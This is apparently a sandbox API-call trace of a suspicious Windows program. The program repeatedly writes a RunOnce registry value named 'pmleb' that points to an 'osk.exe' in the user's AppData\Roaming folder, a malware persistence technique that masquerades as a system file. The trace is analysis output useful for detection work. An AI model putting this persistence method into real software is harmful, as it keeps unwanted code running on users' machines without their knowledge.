0x21ff [0092.468] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.482] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.482] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.482] KillTimer (hWnd=0x20280, uIDEvent=0x21ff) returned 1 [0092.483] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.483] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.483] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.483] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.483] RegCloseKey (hKey=0x280) returned 0x0 [0092.484] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.484] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.484] SetTimer (hWnd=0x20280, nIDEvent=0x2200, uElapse=0xa, lpTimerFunc=0x0) returned 0x2200 [0092.484] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.498] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.498] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.498] KillTimer (hWnd=0x20280, uIDEvent=0x2200) returned 1 [0092.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.499] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.499] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.499] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.499] RegCloseKey (hKey=0x280) returned 0x0 [0092.499] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.499] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.499] SetTimer (hWnd=0x20280, nIDEvent=0x2201, uElapse=0xa, lpTimerFunc=0x0) returned 0x2201 [0092.499] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.514] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.514] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.514] KillTimer (hWnd=0x20280, uIDEvent=0x2201) returned 1 [0092.515] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.515] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.515] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.515] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.516] RegCloseKey (hKey=0x280) returned 0x0 [0092.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.516] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.516] SetTimer (hWnd=0x20280, nIDEvent=0x2202, uElapse=0xa, lpTimerFunc=0x0) returned 0x2202 [0092.516] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.529] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.529] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.529] KillTimer (hWnd=0x20280, uIDEvent=0x2202) returned 1 [0092.530] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.530] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.530] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.530] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.531] RegCloseKey (hKey=0x280) returned 0x0 [0092.531] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.531] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.531] SetTimer (hWnd=0x20280, nIDEvent=0x2203, uElapse=0xa, lpTimerFunc=0x0) returned 0x2203 [0092.531] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.545] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.545] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.545] KillTimer (hWnd=0x20280, uIDEvent=0x2203) returned 1 [0092.545] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.546] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.546] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.546] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.546] RegCloseKey (hKey=0x280) returned 0x0 [0092.546] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.546] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.546] SetTimer (hWnd=0x20280, nIDEvent=0x2204, uElapse=0xa, lpTimerFunc=0x0) returned 0x2204 [0092.546] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.561] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.561] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.561] KillTimer (hWnd=0x20280, uIDEvent=0x2204) returned 1 [0092.561] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.562] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.562] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.562] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.562] RegCloseKey (hKey=0x280) returned 0x0 [0092.562] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.562] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.562] SetTimer (hWnd=0x20280, nIDEvent=0x2205, uElapse=0xa, lpTimerFunc=0x0) returned 0x2205 [0092.562] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.576] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.576] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.576] KillTimer (hWnd=0x20280, uIDEvent=0x2205) returned 1 [0092.576] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.577] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.577] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.577] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.577] RegCloseKey (hKey=0x280) returned 0x0 [0092.577] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.577] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.578] SetTimer (hWnd=0x20280, nIDEvent=0x2206, uElapse=0xa, lpTimerFunc=0x0) returned 0x2206 [0092.578] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.599] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.599] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.599] KillTimer (hWnd=0x20280, uIDEvent=0x2206) returned 1 [0092.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.600] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.600] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.601] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.601] RegCloseKey (hKey=0x280) returned 0x0 [0092.601] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.601] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.601] SetTimer (hWnd=0x20280, nIDEvent=0x2207, uElapse=0xa, lpTimerFunc=0x0) returned 0x2207 [0092.601] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.607] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.607] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.607] KillTimer (hWnd=0x20280, uIDEvent=0x2207) returned 1 [0092.607] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.608] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.608] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.608] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.608] RegCloseKey (hKey=0x280) returned 0x0 [0092.608] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.609] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.609] SetTimer (hWnd=0x20280, nIDEvent=0x2208, uElapse=0xa, lpTimerFunc=0x0) returned 0x2208 [0092.609] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.623] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.623] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.623] KillTimer (hWnd=0x20280, uIDEvent=0x2208) returned 1 [0092.623] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.624] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.624] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.624] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.624] RegCloseKey (hKey=0x280) returned 0x0 [0092.624] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.624] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.624] SetTimer (hWnd=0x20280, nIDEvent=0x2209, uElapse=0xa, lpTimerFunc=0x0) returned 0x2209 [0092.624] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.640] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.640] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.640] KillTimer (hWnd=0x20280, uIDEvent=0x2209) returned 1 [0092.640] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.641] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.641] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.641] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.641] RegCloseKey (hKey=0x280) returned 0x0 [0092.641] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.641] SetTimer (hWnd=0x20280, nIDEvent=0x220a, uElapse=0xa, lpTimerFunc=0x0) returned 0x220a [0092.641] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.654] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.654] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.654] KillTimer (hWnd=0x20280, uIDEvent=0x220a) returned 1 [0092.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.655] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.655] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.655] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.655] RegCloseKey (hKey=0x280) returned 0x0 [0092.655] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.655] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.655] SetTimer (hWnd=0x20280, nIDEvent=0x220b, uElapse=0xa, lpTimerFunc=0x0) returned 0x220b [0092.656] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.669] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.669] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.670] KillTimer (hWnd=0x20280, uIDEvent=0x220b) returned 1 [0092.670] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.670] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.670] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.671] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.671] RegCloseKey (hKey=0x280) returned 0x0 [0092.671] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.671] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.671] SetTimer (hWnd=0x20280, nIDEvent=0x220c, uElapse=0xa, lpTimerFunc=0x0) returned 0x220c [0092.671] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.685] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.685] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.685] KillTimer (hWnd=0x20280, uIDEvent=0x220c) returned 1 [0092.685] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.686] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.686] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.686] RegCloseKey (hKey=0x280) returned 0x0 [0092.686] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.686] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.686] SetTimer (hWnd=0x20280, nIDEvent=0x220d, uElapse=0xa, lpTimerFunc=0x0) returned 0x220d [0092.686] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.701] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.701] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.701] KillTimer (hWnd=0x20280, uIDEvent=0x220d) returned 1 [0092.701] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.701] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.702] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.702] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.702] RegCloseKey (hKey=0x280) returned 0x0 [0092.702] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.702] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.702] SetTimer (hWnd=0x20280, nIDEvent=0x220e, uElapse=0xa, lpTimerFunc=0x0) returned 0x220e [0092.702] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.716] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.716] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.717] KillTimer (hWnd=0x20280, uIDEvent=0x220e) returned 1 [0092.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.717] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.717] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.718] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.718] RegCloseKey (hKey=0x280) returned 0x0 [0092.718] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.718] SetTimer (hWnd=0x20280, nIDEvent=0x220f, uElapse=0xa, lpTimerFunc=0x0) returned 0x220f [0092.718] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.732] KillTimer (hWnd=0x20280, uIDEvent=0x220f) returned 1 [0092.732] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.733] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.733] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.733] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.734] RegCloseKey (hKey=0x280) returned 0x0 [0092.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.734] SetTimer (hWnd=0x20280, nIDEvent=0x2210, uElapse=0xa, lpTimerFunc=0x0) returned 0x2210 [0092.734] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.747] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.748] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.748] KillTimer (hWnd=0x20280, uIDEvent=0x2210) returned 1 [0092.748] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.749] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.749] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.749] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.749] RegCloseKey (hKey=0x280) returned 0x0 [0092.749] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.749] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.750] SetTimer (hWnd=0x20280, nIDEvent=0x2211, uElapse=0xa, lpTimerFunc=0x0) returned 0x2211 [0092.750] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.763] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.763] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.763] KillTimer (hWnd=0x20280, uIDEvent=0x2211) returned 1 [0092.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.764] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.764] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 